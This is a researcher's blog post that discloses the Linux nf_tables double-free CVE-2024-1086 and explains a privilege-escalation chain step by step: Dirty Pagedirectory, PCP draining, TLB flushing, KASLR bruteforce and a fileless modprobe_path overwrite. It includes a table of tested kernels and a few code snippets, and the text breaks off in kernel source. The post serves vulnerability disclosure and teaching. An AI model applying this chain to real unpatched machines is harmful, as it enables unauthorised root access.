Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques

Tue, 26 Mar 2024 11:45:00 GMT

This blogpost is the next instalment of my series of hands-on no-boilerplate vulnerability research blogposts, intended for time-travellers in the future who want to do Linux kernel vulnerability research. Specifically, I hope beginners will learn from my VR workflow and the seasoned researchers will learn from my techniques.

In this blogpost, I'm discussing a bug I found in nf_tables in the Linux kernel (CVE-2024-1086) and its root cause analysis. Then, I show several novel techniques I used to drop a universal root shell on nearly all Linux kernels between at least v5.14 and v6.6.14 (unpriv userns required) without even recompiling the exploit. This is possible because of the data-only, KSMA-based nature of the exploit. Among those targeted kernels are Ubuntu kernels, recent Debian kernels, and one of the most hardened Linux kernels out there (KernelCTF mitigation kernels).

Additionally, I'm providing the proof-of-concept source code (also available in the CVE-2024-1086 PoC repository on Github). As a bonus, I wanted to challenge myself by making the exploit support fileless execution (which helps in CNO and avoids detections in pentests), and by not making any changes to the disk whatsoever (including setting /bin/sh to SUID 0 et cetera).

This blogpost aims to be a supplementary guide to the original Dirty Pagetable blogpost as well, considering there were not any blogposts covering the practical bits (e.g. TLB flushing for exploits) when I started writing this blogpost. Additionally, I hope the skb-related techniques will be embedded in remote network-based exploits (e.g. bugs in IPv4, if they still exist), and I hope that the Dirty Pagedirectory technique will be utilized for LPE exploits. Let's get to the good stuff!

Blogpost image cover: bird's-eye view of the exploit, including the vulnerability and some of the techniques, for visual purposes.

0. Before you read

0.1. How to read this blogpost

To the aspiring vulnerability researchers: I wrote this blogpost in a way that slightly resembles a research paper in terms of format, because that format happens to be exactly what I was looking for: it is easy to scan and cherrypick knowledge from, even though it may be a big pill to swallow. Because research papers are considered hard to read by many people, I'd like to give steps on how I would read this blogpost to extract knowledge efficiently:

  1. Read the overview section (check if the content is even interesting to you)
  2. Split-screen this blogpost (reading and looking up)
  3. Skip to the bug section (try to understand how the bug works)
  4. Skip to the proof of concept section (walk through the exploit)

If things are not clear, utilize the background and/or techniques section. If you want to learn more about a specific topic, I have attached an external article for most sections.

0.2. Affected kernel versions

This section contains information about the affected kernel versions for this exploit, which is useful when looking up existing techniques for exploiting a bug. Based on these observations, it seems feasible that all versions from at least (including) v5.14.21 to (including) v6.6.14 are exploitable, depending on the kconfig values (details below). This means that at the time of writing, the stable branches linux-5.15.y, linux-6.1.y, and linux-6.6.y are affected by this exploit, and perhaps linux-6.7.1 as well. Fortunately for the users, a bugfix in the stable branches was released in February 2024.

Note that the same base config file was reused for most vanilla kernels, and that the mentioned versions are all vulnerable to the PoC bug. The base config was generated with kernel-hardening-checker. Additionally, if a version isn't affected by the bug, yet the exploitation techniques work, it will not be displayed in the table.

For vanilla kernels, CONFIG_INIT_ON_FREE_DEFAULT_ON was toggled off in the config. This option sets a page to null-bytes after free, which thwarts the skb part of the exploit. The option is toggled off in major distros like KernelCTF, Ubuntu, and Debian, so I consider this an acceptable measure. However, CONFIG_INIT_ON_ALLOC_DEFAULT_ON remains toggled on, as this is part of the Ubuntu and Debian kernel config. Unfortunately, this causes bad_page() detection as a side effect in versions starting from v6.4.0. When CONFIG_INIT_ON_ALLOC_DEFAULT_ON is toggled off, the exploit works up to (including) v6.6.4.

The success rate of the exploit is 99.4% (n=1000) - sometimes with drops to 93.0% (n=1000) - on Linux kernel v6.4.16, with the setup as below (and the kernelctf filesystem). I do not expect the success rate to deviate much across versions, although it might deviate per device workload. I consider an exploit working for a particular setup if it succeeds at all attempts at trying it out (manual verification, so usually 1-2 tries). Because of the high success rate, it is pretty easy to tell whether the exploit works or not. Additionally, all failures have been investigated and their reasons have been included in the table, so false positives are unlikely.

All non-obsolete techniques (and the resulting PoC) were tested on the following setups:

| Kernel | Kernel Version | Distro    | Distro Version    | Working/Fail | CPU Platform      | CPU Cores | RAM Size | Fail Reason                                                                           | Test Status | Config URL                                                                                                                               |
|--------|----------------|-----------|-------------------|--------------|-------------------|-----------|----------|---------------------------------------------------------------------------------------|-------------|------------------------------------------------------------------------------------------------------------------------------------------|
| Linux  | v5.4.270       | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [CODE] pre-dated nft code (denies rule alloc)                                         | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.4.270.config               |
| Linux  | v5.10.209      | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] BUG mm/slub.c:4118                                                            | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.10.209.config              |
| Linux  | v5.14.21       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.14.21.config               |
| Linux  | v5.15.148      | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.15.148.config              |
| Linux  | v5.16.20       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.16.20.config               |
| Linux  | v5.17.15       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.17.15.config               |
| Linux  | v5.18.19       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.18.19.config               |
| Linux  | v5.19.17       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.19.17.config               |
| Linux  | v6.0.19        | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.0.19.config                |
| Linux  | v6.1.55        | KernelCTF | Mitigation v3     | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-kernelctf-mitigationv3-v6.1.55.config |
| Linux  | v6.1.69        | Debian    | Bookworm 6.1.0-17 | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-debian-v6.1.0-17-amd64.config         |
| Linux  | v6.1.69        | Debian    | Bookworm 6.1.0-17 | working      | AMD Ryzen 5 7640U | 6         | 32GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-debian-v6.1.0-17-amd64.config         |
| Linux  | v6.1.72        | KernelCTF | LTS               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-kernelctf-lts-v6.1.72.config          |
| Linux  | v6.2.?         | Ubuntu    | Jammy v6.2.0-37   | working      | AMD Ryzen 5 7640U | 6         | 32GiB    | n/a                                                                                   | final       |                                                                                                                                          |
| Linux  | v6.2.16        | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.2.16.config                |
| Linux  | v6.3.13        | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.3.13.config                |
| Linux  | v6.4.16        | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.4.16.config                |
| Linux  | v6.5.3         | Ubuntu    | Jammy v6.5.0-15   | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-ubuntu-jammy-v6.5.0-15.config         |
| Linux  | v6.5.13        | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.5.13.config                |
| Linux  | v6.6.14        | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.6.14.config                |
| Linux  | v6.7.1         | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [CODE] nft verdict value is altered by the kernel                                     | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.7.1.config                 |

Table 0.2.1: An overview of the exploit test results per tested kernel versions and their setups.

1. Overview

1.1. Abstract

In this blogpost I present several novel techniques I used to exploit a 0-day double-free bug in hardened Linux kernels (i.e. KernelCTF mitigation instances) with a 93%-99% success rate. The underlying bug is an input sanitization failure of netfilter verdicts. Hence, the requirements for the exploit are that nf_tables is enabled and that unprivileged user namespaces are enabled. The exploit is data-only and performs a kernel-space mirroring attack (KSMA) from userland with the novel Dirty Pagedirectory technique (pagetable confusion), whereby it is able to link any physical address (and its permissions) to virtual memory addresses by performing just reads/writes to userland addresses.

1.2. Workflow

To trigger the bug leading to the double-free, I add a Netfilter rule in an unprivileged user namespace. The Netfilter rule contains an expression which sets a malicious verdict value: the internal nf_tables kernel code first interprets it as NF_DROP and frees the skb, but then returns NF_ACCEPT so the packet handling continues, double-freeing the skb. Then, I trigger this rule by allocating a 16-page IP packet (so that it gets allocated by the buddy-allocator and not the PCP-allocator or slab-allocator, and it shares a cache across CPUs) which has migratetype 0.

In order to delay the 2nd free (so I can perform the intermediate exploitation steps without corruption), I abuse the IP fragmentation logic of an IP packet. This allows us to make an skb "wait" in an IP fragmentation queue without being freed for an arbitrary amount of seconds. In order to traverse this code path with corrupted packet metadata, I spoof IP source address 1.1.1.1 and destination address 255.255.255.255. However, this means we get to deal with Reverse Path Forwarding (RPF), so we need to disable it in our networking namespace (which does not require root privileges).
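Disabling RPF from inside the unprivileged user+network namespace boils down to a couple of sysctl writes. A hedged sketch (the exact sysctl keys the PoC toggles are an assumption):

```shell
# Inside the unprivileged user+net namespace (no real root required there);
# rp_filter would otherwise drop our spoofed 1.1.1.1 -> 255.255.255.255 fragments.
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter
```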

To achieve unlimited R/W to any physical memory address (including kernel addresses), I present the Dirty Pagedirectory technique. This technique is - loosely speaking - pagetable confusion, achieved by allocating a PTE page and a PMD page at the same physical page.

Unfortunately, these pagetable pages are migratetype==0 order==0 pages allocated with alloc_pages(), and skb heads (the double-free'd objects) are allocated with kmalloc, which means the slab-allocator is used for page order<=1, the PCP-allocator is used for order<=3, and the buddy-allocator for order>=4. To avoid hassle (explained in detail in the blogpost), we have to use order>=4 pages for the double-free. This also means we cannot directly use a double-free on buddy-allocator pages (order>=4) to double allocate PTE/PMD pages (order==0), but I discovered methods to achieve this.

To double allocate PTE/PMD pages with the kmalloc-based double-free, I present 2 methods:

The better page conversion technique (PCP draining)
In this simpler, more stable, and faster method we take advantage of the fact that the PCP-allocator is simply a per-CPU freelist, which is refilled with pages from the buddy-allocator when it is drained. Hence, we can simply free the order==4 (16-page) blocks to the buddy-allocator freelist, drain the order==0 PCP list, and let it refill with 64 pages from the buddy-allocator freelist, containing said 16 pages.

The original page conversion technique (race condition)
This method relies on a race condition and hence only works in virtualized environments such as QEMU VMs, where terminal IO causes a substantial delay in the VM's kernel. We take advantage of a WARN() message which causes a ~50-300ms delay to trigger a race condition, in order to free an order==4 buddy page to an order==0 PCP freelist. As you may notice, this does not work on real hardware (as the delay is ~1ms) and is therefore replaced with the method above. Unfortunately, I used this technique for the original kernelctf exploit.

Between the two frees of the double-free, I make sure the page refcounts never reach 0, since that would deny freeing the page (possibly as a double-free mitigation). Additionally, I spray skb objects into the skbuff_head_cache slabcache of the same CPU to avoid the experimental freelist corruption detection in the kernelctf mitigation instance, and to increase stability in general.

When the double-free primitive is achieved, I use a new technique called Dirty Pagedirectory to achieve unlimited read/write to any physical address. This requires double-allocating a page table entry (PTE) page and a page middle directory (PMD) page at the same address. When writing an arbitrary PTE value - containing page permissions and a physical page address - to a page within the span of the PTE page, the PMD page will interpret said value when a page within the PMD page's span is dereferenced. This boils down to setting a PTE value to 0xDEADBEEF entirely from userland, and then dereferencing that PTE value from userland again to access the page referenced by 0xDEADBEEF, using the flags (including but not limited to permissions) set in 0xDEADBEEF.

In order to utilize this unlimited R/W primitive, we need to flush the TLB. After reading several impractical research papers I came up with my own complex flushing algorithm to flush TLBs in Linux from userland: calling fork() and munmap()'ing the flushed VMA. In order to avoid crashes when the child exits the program, I make the child thread go to sleep indefinitely.

I utilize this unlimited physical memory access to bruteforce physical KASLR. The bruteforce is accelerated because the physical kernel base is aligned to CONFIG_PHYSICAL_START (a.k.a. 0x100'0000 / 16MiB) or - when defined - CONFIG_PHYSICAL_ALIGN (a.k.a. 0x20'0000 / 2MiB). Hence, I can leak the physical kernel base address by checking 2MiB worth of pages on a machine with 8GiB memory (assuming 16MiB alignment), which even fits into the area of a single overwritten PTE page. To detect the kernel, I used the get-sig scripts - which generate a highly precise fingerprint of files, like recent Linux kernels across compilers - and slapped that into my exploit.

In order to find modprobe_path, I do a fairly simplistic "/sbin/modprobe" + "\x00" * ... memory scan across 80MiB beyond the detected kernel base to get access to modprobe_path. To verify that the "real" modprobe_path variable was found instead of a false-positive, I overwrite modprobe_path and check if /proc/sys/kernel/modprobe (read-only user interface for modprobe_path) reflects this change. If CONFIG_STATIC_USERMODEHELPER is enabled, it will just check for "/sbin/usermode-helper".

In order to drop a root shell (including a namespace escape) I overwrite modprobe_path or "/sbin/usermode-helper" with the exploit's memfd file descriptor path containing the privesc script, such as /proc/<pid>/fd/<fd>. This fileless approach allows the exploit to be run on an entirely read-only filesystem (it being bootstrapped using perl). The PID has to be bruteforced if the exploit is running in a namespace - because the exploit only knows the namespace PID - but this is luckily incredibly fast, since we don't need to flush the TLB as we aren't changing the physical address in the PTE. This essentially boils down to writing the string to a userland address and executing a file.

In the privesc script, we execute a /bin/sh process (as root) and hook the exploit's file descriptors (/proc/<pid>/fd/<fd>) to the shell's file descriptors, allowing us to achieve a namespace escape. The advantage of this method is that it's very versatile, as it works on local terminals and reverse shells, all without depending on filesystems and other forms of isolation.

2. Background info

2.1. nf_tables

One of the in-tree Linux kernel modules is nf_tables. In recent versions of iptables - which is one of the most popular firewall tools out there - the nf_tables kernel module is the backend. iptables itself is, in turn, the backend of ufw. In order to decide which packets will pass the firewall, nftables uses a state machine with user-issued rules.

2.1.1. Netfilter Hierarchy

These rules come in the following orders (i.e. one table contains many chains, one chain contains many rules, one rule contains many expressions):

  • Tables (which protocol)
  • Chains (which trigger)
  • Rules (state machine functions)
  • Expressions (state machine instructions)

Illustration 2.1.1.1: Nftables hierarchy overview of tables, chains, rules and expressions.

This allows users to program complex firewall rules, because nftables has many atomic expressions which can be chained together in rules to filter packets. Additionally, it allows chains to be run at different times in the packet processing code (i.e. before routing and after routing), which can be selected when creating a chain using flags like NF_INET_LOCAL_IN and NF_INET_POST_ROUTING. Due to this extremely customizable nature, nftables is known to be incredibly insecure. Hence, many vulnerabilities have been reported and fixed already.
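For intuition, the hierarchy maps directly onto nft(8) commands; an illustrative ruleset (the names are made up, and this is not the PoC's ruleset):

```shell
nft add table ip example_table                                    # table: IPv4 protocol family
nft add chain ip example_table input_chain \
    '{ type filter hook input priority 0; policy accept; }'       # chain: trigger (input hook)
nft add rule ip example_table input_chain ip saddr 1.1.1.1 drop   # rule built from expressions
```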

To learn more about nftables, I recommend this blogpost by @pqlqpql which goes into the deepest trenches of nftables: "How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables."

2.1.2. Netfilter Verdicts

More relevant to the blogpost are Netfilter verdicts. A verdict is a decision by a Netfilter ruleset about a certain packet trying to pass the firewall. For example, it may be a drop or an accept. If the rule decides to drop the packet, Netfilter will stop processing the packet. On the contrary, if the rule decides to accept the packet, Netfilter will continue processing the packet until the packet passes all rules. At the time of writing, all the verdicts are:

  • NF_DROP: Drop the packet, stop processing it.
  • NF_ACCEPT: Accept the packet, continue processing it.
  • NF_STOLEN: Stop processing, the hook needs to free it.
  • NF_QUEUE: Let userland application process it.
  • NF_REPEAT: Call the hook again.
  • NF_STOP (deprecated): Accept the packet, stop processing it in Netfilter.

2.2. sk_buff (skb)

To describe network data (including IP packets, ethernet frames, WiFi frames, etc.) the Linux kernel uses the sk_buff structure and commonly calls them skb's as shorthand. To represent a packet, the kernel uses 2 objects which are important to us: the sk_buff object itself which contains kernel meta-data for skb handling, and the sk_buff->head object which contains the actual packet content like the IP header and the IP packets' body.

Illustration 2.2.1: Overview of the sk_buff structure's data buffer and its length field.

In order to use values from the IP header (since IP packets are parsed in the kernel after all), the kernel does type punning with the IP header struct and the sk_buff->head object using ip_hdr(). This pattern is applied across the kernel since it allows for quick header parsing. As a matter of fact, the type punning trick is also used to parse ELF headers when executing a binary.

To learn more, check this excellent Linux kernel documentation page: "struct sk_buff - The Linux Kernel."

2.3. IP packet fragmentation

One of the features of IPv4 is packet fragmentation. This allows packets to be transmitted using multiple IP fragments. Fragments are just regular IP packets, except that they do not contain the full payload whose size is specified in the IP header, and that they have the IP_MF flag set in the header (except for the last fragment).

The general calculation for the IP packet length in an IP fragment's header is iph->len = sizeof(struct ip_header) * frags_n + total_body_length. In the Linux kernel, all fragments for a single IP packet are stored in the same red-black tree (called an IP frag queue) until all fragments have been received. In order to determine which fragment belongs at which offset when reassembling, the IP fragment offset is required: iph->offset = body_offset >> 3, whereby body_offset is the offset in the final IP body, thus excluding any IP header lengths which may be used when calculating iph->len. As you may notice, fragment data has to be aligned to 8 bytes because the specs specify that the upper 3 bits of the offset field are used for flags (i.e. IP_MF and IP_DF). If we want to transmit 64 bytes of data across 2 fragments whose sizes are 8 bytes and 56 bytes respectively, we should format it like the code below. The kernel would then reassemble the IP packet as 'A' * 64.

iph1->len = sizeof(struct ip_header)*2 + 64;
iph1->offset = ntohs(0 | IP_MF); // set MORE FRAGMENTS flag 
memset(iph1_body, 'A', 8); 
transmit(iph1, iph1_body, 8); 

iph2->len = sizeof(struct ip_header)*2 + 64; 
iph2->offset = ntohs(8 >> 3); // don't set IP_MF since this is the last packet 
memset(iph2_body, 'A', 56); 
transmit(iph2, iph2_body, 56);

Codeblock 2.3.1: C pseudocode describing the IP header format of IP fragments.

To learn more about packet fragmentation, check this blogpost by PacketPushers: "IP Fragmentation in Detail."

2.4. Page allocation

There are 3 major ways to allocate pages in the Linux kernel: using the slab-allocator, the buddy-allocator and the per-cpu page (PCP) allocator. In short: the buddy-allocator is invoked with alloc_pages(), can be used for any page order (0->10), and allocates pages from a global pool of pages across CPUs. The PCP-allocator is also invoked with alloc_pages(), and can be used to allocate pages with order 0->3 from a per-CPU pool of pages. Additionally, there's the slab-allocator, which is invoked with kmalloc() and can allocate pages with order 0->1 (including smaller allocations) from specialized per-CPU freelists/caches.

The PCP-allocator exists because the buddy-allocator locks access when a CPU is allocating a page from the global pool, and hence blocks another CPU when it wants to allocate a page. The PCP-allocator prevents this by having a smaller per-CPU pool of pages which are allocated in bulk by the buddy-allocator in the background. This way, the chance of page allocation blockage is smaller.

Illustration 2.4.1: Overview of available page allocators per order.
Illustration 2.4.2: Activity diagram of the page allocation process, starting from kmalloc().

To learn more about the buddy-allocator and the PCP-allocator, check the Page Allocation section of this extensive analysis: "Reference: Analyzing Linux kernel memory management anomalies."

2.5. Physical memory

2.5.1. Physical-to-virtual memory mappings

One of the most fundamental elements of the kernel is memory management. When we are talking about memory, we could be talking about 2 types of memory: physical memory and virtual memory. Physical memory is what the RAM chips use, and virtual memory is how programs (including the kernel) running on the CPU interact with the physical memory. Of course, when we use gdb to debug a binary, all addresses we use are virtual - since gdb and the underlying program are such programs as well.

Essentially, virtual memory is built on top of physical memory. The advantage of this model is that the virtual address range is larger than the physical address range - since empty virtual memory pages can be unmapped - which is good for ASLR efficiency, among other things. Additionally, we can map 1 physical page to many virtual pages, or maintain the illusion of 128TiB worth of addresses whilst in practice most of these are not backed by an actual page.

This means that we can work with 128TiB virtual memory ranges per process on a system with only 4GiB of physical memory. In theory, we could even map a single physical page of 4096 \x41 bytes to all 128TiB worth of userland virtual pages. When a program wants to write a \x42 byte to a virtual page, we perform copy-on-write (COW) and create a 2nd physical page and map that page to just the virtual page that the program wrote to.

Illustration 2.5.1.1: Mappings between virtual and physical memory pages.

In order to translate virtual memory addresses to physical memory addresses, the CPU utilizes pagetables. So when our userland program tries to read (virtual memory) address 0xDEADBEEF, the CPU will essentially do mov rax, [0xDEADBEEF]. However, in order to actually read the value from the RAM chips, the CPU needs to convert the virtual memory address 0xDEADBEEF to a physical memory address.

This translation is oblivious to the kernel and our userland program when accessing a virtual memory address. To perform this translation, the CPU performs a lookup in the Translation Lookaside Buffer (TLB) - which exists in the MMU - which caches the virtual-to-physical address translations. If the virtual 0xDEADBEEF address (or more specifically, the virtual 0xDEADB000 page) has been recently accessed, the TLB does not have to traverse the pagetables and will have the physical address belonging to the virtual address in cache. Otherwise, if the address is not in the TLB cache, the TLB needs to traverse the pagetables to get the physical address. This will be covered in the next subsection.

To learn more about physical memory, check this excellent memory layout page from Harvard's Operating Systems course.

2.5.2. Pagetables

When the TLB is asked for the physical address of a virtual address which is not in its cache, it performs a "pagewalk" to acquire the physical address. A pagewalk means traversing the pagetables, which are a few nested arrays, with the physical addresses in the bottom arrays.

Note that the diagram below uses pagetable indices of 9 bits (because 2**9 = 512 pagetable values fit into a single page). Additionally, we are using 4-level pagetables here, but the kernel also supports 5-level, 3-level, et cetera.

Illustration 2.5.2.1: An example of virtual address to physical address translation.

This model of nested arrays is used because it saves a lot of memory. Instead of allocating a huge array for 128TiB of virtual addresses, it instead divides it into several smaller arrays with each layer having a smaller bailiwick. This means that tables responsible for an unallocated area will not be allocated.

Traversing the pagetables is a very inexpensive process, since it is essentially 4-5 array dereferences. The indices for these dereferences are - get ready to have your mind blown - embedded in the virtual address. This means that a virtual address is not really an address, but pagetable indices with a canonical prefix. This elegant approach allows for O(1) physical address retrieval, since array dereferences are O(1) and the bit shifting to recover the indices is O(1) as well. Unfortunately, pagetables would need to be traversed very often, which would make even these array dereferences slow. Hence, the TLB is implemented.

In terms of practicality, the TLB needs to find the pagetables in physical memory to pagewalk them. The address for the root of the userland pagetable hierarchy (PGD) of the running process is stored in the privileged CR3 register in the corresponding CPU core. 'Privileged' means that the register can only be accessed from kernelspace, as userland accesses will lead to a permission error. When the kernel scheduler makes the CPU switch to another process context, the kernel will set the CR3 register to virt_to_phys(current->mm->pgd).

To learn more about how the MMU finds the location of the pagetable hierarchy when the CPU needs to do a TLB lookup with cache miss, check the Wikipedia page on control registers.

2.6. TLB Flushing

TLB Flushing is the practice of, well, flushing the TLB. The translation lookaside buffer (TLB) caches translations between virtual addresses and physical addresses. This practice delivers a huge performance increase as the CPU doesn't have to traverse the pagetables anymore and can instead lookaside to the TLB.

When a virtual address's pagetable hierarchy changes in kernelspace, it needs to be updated in the TLB as well. This is invoked manually by the kernel with function calls in the same functions where the pagetables are changed. These functions "flush" the TLB, which empties its translation cache (possibly only for a certain address range). Then, the next time the virtual address is accessed, the TLB will save the fresh translation to its cache.

However, in exploits we sometimes change the pagetables (and their virtual addresses) at times when that's not expected. An example of this is using a UAF write bug to overwrite a PTE. In that case, the TLB flushing functions in the kernel are not called, since we are not going through the kernel functions which change the pagetables (and which do invoke said flushing functions). Hence, we need to flush the TLB indirectly from userland; otherwise, the TLB would contain outdated cache entries. In the techniques section of this blogpost I present my own method of doing this.

To learn more about the TLB, check the Wikipedia article: "Translation lookaside buffer - Wikipedia."

2.7. Dirty Pagetable

Dirty Pagetable is a novel technique presented by N. Wu, which boils down to overwriting PTEs in order to perform a KSMA attack. Their research paper presents 2 scenarios to overwrite PTEs: a double-free bug and a UAF-write bug. Both scenarios are supplemented with a practical example. The original paper is definitely worth a read; I learned a lot from it.

Illustration 2.7.1: An high-level overview of the Dirty Pagetable technique.

However, a few critical topics are out-of-scope in the original paper, which I try to include in this blogpost: how pagetables work, TLB flushing, proof-of-concept code, the workings of physical KASLR, and the format of PTE values. Additionally, I present a variation on this technique (Dirty Pagedirectory) in this blogpost.

To learn more, check the original research paper by N. Wu: "Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel."

2.8. Overwriting modprobe_path

One of the more classical privilege escalation techniques is overwriting the modprobe_path variable in the kernel. The value of the variable is set to CONFIG_MODPROBE_PATH at compile-time, and is padded with nullbytes to KMOD_PATH_LEN bytes. Usually, CONFIG_MODPROBE_PATH is set to "/sbin/modprobe", as that is the usual filepath for the modprobe binary.

The variable is used when a user tries to execute a binary with an unknown magic-bytes header. For instance, the magic bytes of an ELF binary are 7F45 4C46 (a.k.a. "\x7fELF"). When executing a binary, the kernel will look for a registered binary handler which matches said magic bytes. In the case of ELF, the ELF binfmt handler is selected. However, when no registered binfmt matches, modprobe will be invoked using the path stored in modprobe_path, and it will query for a kernel module with the name binfmt-%04x, where %04x is the hex representation of 2 bytes from the file's header.

Illustration 2.8.1: Analysis of the modprobe_path privilege escalation technique.

To exploit this, we can overwrite the value of modprobe_path with the path of a privilege escalation script (which gives /bin/sh root SUID, for instance), and then invoke modprobe by trying to execute a file with an invalid format, such as ffff ffff. The kernel will then run /tmp/privesc_script.sh -q -- binfmt-ffff as root, which allows us to run any code as root. This saves us the hassle of having to call kernel functions ourselves, and instead allows easy privesc by overwriting a single string.

Somewhere along the line, the CONFIG_STATIC_USERMODEHELPER_PATH mitigation was introduced, which makes overwriting modprobe_path useless. The mitigation works by routing every usermode-helper invocation through a single compile-time binary path, pointing to a busybox-like binary which behaves differently based on the argv[0] filename passed to it. Hence, if we overwrite modprobe_path, only this argv[0] value would differ, which the busybox-like binary does not recognize and hence would not execute.

The exploit presented in this blogpost works both with and without CONFIG_STATIC_USERMODEHELPER_PATH, because we can simply overwrite the read-only "/sbin/usermode-helper" string in kernel memory.

To learn more about the modprobe_path technique, check this useful page on Github by user Smallkirby: "modprobe_path.md · smallkirby/kernelpwn."

2.9. KernelCTF

KernelCTF is a program run by Google with the intent of disclosing new exploitation techniques for (hardened) Linux kernels. It's also a great way to get an ethical bounty for any vulnerabilities you may find in the Linux kernel, as the bounties range from $21,337 up to $111,337 and beyond, depending on the scope of the vulnerability and whether any novel techniques are involved.

The major outlines are that there are 3 machine categories: LTS (long-term stable kernel hardened with existing mitigations), mitigation (kernel hardened with experimental mitigations on top of existing mitigations), and COS (container-optimized OS). Each machine can be hacked once per version, and the researcher who hacks the machine first gets the reward. This means that if researcher A hacked LTS version 6.1.63, then researcher A and researcher B can still hack mitigation version 6.1.63. After the next version is released on the KernelCTF platform (typically after 2 weeks), both researcher A and researcher B can hack LTS version 6.1.65 again. However, the bug reported by researcher A for version 6.1.63 will most likely be fixed by then, and would be treated as a duplicate anyway if it were to be exploited again.

In order to "hack" the KernelCTF machine, the researcher needs to read the /flag file in the root (jail host) namespace, which is only readable by the root user. As you may expect, this may require both a namespace sandbox (nsjail) escape and a privilege escalation to the root user. At the end of the day, this does not matter as long as the flag is captured.

To debug the environment, check the local_runner.sh script which the KernelCTF team provides. Note the --root flag, which allows you to run a root shell from outside of the jail.

To learn more about the KernelCTF program, check this page: "KernelCTF rules | security-research."

3. The bug

3.1. Finding the bug

It all started when I wanted to implement firewall bypasses into my ORB rootkit Netkit. I wanted to rely on the kernel API (exported functions) for any actions, as it would have the same compatibility as regular kernel modules. Hopefully, this would mean that the rootkit kernel module could be used across architectures and kernel versions, without having to change the source code.

This led me into the rabbit hole called Netfilter. Before this research, I had no practical experience with Netfilter, so I had to do a lot of research on my own. Thankfully, there is plenty of documentation available from both the kernel developers and the infosec community. After reading up on the subsystem, I read a bunch of source code from the top down related to nf_tables rules and expressions.

While reading nf_tables code - whose state machine is very interesting from a software development point of view - I noticed the nf_hook_slow() function. This function loops over all rules in a chain and stops evaluation (returns from the function) immediately when NF_DROP is issued.

In the NF_DROP handling, it frees the packet and allows a user to set the return value using NF_DROP_GETERR(). With this knowledge, I made the function return NF_ACCEPT using the drop error when handling NF_DROP. A bunch of kernel panics and code-path analyses later, I found a double-free primitive.

// looping over existing rules when skb triggers chain
int nf_hook_slow(struct sk_buff *skb, struct nf_hook_state *state,
		 const struct nf_hook_entries *e, unsigned int s)
{
	unsigned int verdict;
	int ret;

	// loop over every rule
	for (; s < e->num_hook_entries; s++) {
		// acquire rule's verdict
